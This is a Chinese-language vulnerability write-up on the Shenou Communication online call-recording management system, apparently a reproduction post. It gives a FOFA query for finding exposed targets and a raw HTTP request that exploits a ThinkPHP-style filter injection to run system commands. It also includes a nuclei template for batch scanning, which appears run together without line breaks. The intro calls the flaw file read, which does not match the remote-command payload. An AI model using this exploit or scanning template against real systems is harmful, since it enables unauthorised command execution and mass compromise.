漏洞简介    

        申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露

一.复现过程

fofa搜索语句:title="在线录音管理系统"

1.我们打开burp 进行抓包 把下面的数据包替换成这个 响应命令的执行结果

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 62s=id&_method=__construct&method=POST&filter[]=system

然后是这样 就成功了

二批量脚本

id: LYXT-index-RCEinfo:name: 申瓯通信设备有限公司在线录音管理系统-RCE-index.phpauthor: WLFseverity: highmetadata: FOFA: title="在线录音管理系统"Hunter:   
variables:filename: "{{to_lower(rand_base(5))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-type: application/x-www-form-urlencodedCache-Control: no-cachePragma: no-cacheAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-Length: 62s=echo Hello World!&_method=__construct&method=POST&filter[]=systemmatchers:- type: dsldsl:- contains_all(body,"Hello World!")